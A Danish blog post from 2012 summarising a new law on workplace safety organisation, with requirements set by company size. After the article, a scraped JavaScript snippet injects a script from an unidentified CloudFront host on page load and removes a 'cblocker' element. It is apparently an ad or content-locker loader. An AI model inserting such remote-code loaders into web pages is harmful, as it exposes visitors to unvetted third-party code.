Smartlog v3 » Tips, Guides & Informationer » Ny lov stiller skrappere krav til det gode arbejdsmiljø
Opret egen blog | Næste blog »

Tips, Guides & Informationer

Her på bloggen kan du læse gratis tips, guides og informationer om alt mellem himmel og jord

Ny lov stiller skrappere krav til det gode arbejdsmiljø

14. Aug 2012 13:10, webmayn

Arbejdsmiljøet er i fokus som aldrig før, og Arbejdstilsynet stiller i en ny arbejdsmiljølov skrappere krav til den enkelte virksomhed. Udover udarbejdelse af en APV stilles der nu til alle virksomheder krav om organisering af arbejdsmiljøet.

Den nye lovgivning indeholder krav til arbejdsgiveren, der skal tage initiativ til oprettelse af en arbejdsmiljøorganisation, hvorimod selve etableringen af organisationen skal ske via et samarbejde mellem alle ansatte i virksomheden.

Kravene til organiseringen af arbejdsmiljøet afhænger af virksomhedens størrelse.

Små virksomheder med 1-9 ansatte har ikke pligt til at nedsætte en decideret arbejdsmiljøorganisation, men skal årligt kunne dokumentere overfor Arbejdstilsynet, at en drøftelse af arbejdsmiljøet har fundet sted, og at de ansatte under denne drøftelse er blevet hørt.

Mellemstore virksomheder med 10-34 ansatte har pligt til at oprette en arbejdsmiljøorganisation i et niveau, der skal behandle spørgsmål omhandlende sikkerhed og sundhed. Denne organisation skal som minimum bestå af en arbejdsleder og en arbejdsmiljørepræsentant, der har arbejdsgiveren eller en repræsentant for denne som formand.

Kravet til store virksomheder med 35 eller flere ansatte lyder på etablering af en arbejdsmiljøorganisation i to niveauer; et niveau med arbejdsmiljørepræsentanter, der står for at udføre de daglige arbejdsmiljøopgaver i virksomheden, og et niveau, der tager sig af de mere overordnede arbejdsmiljøopgaver i virksomheden.

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

Tags

Relaterede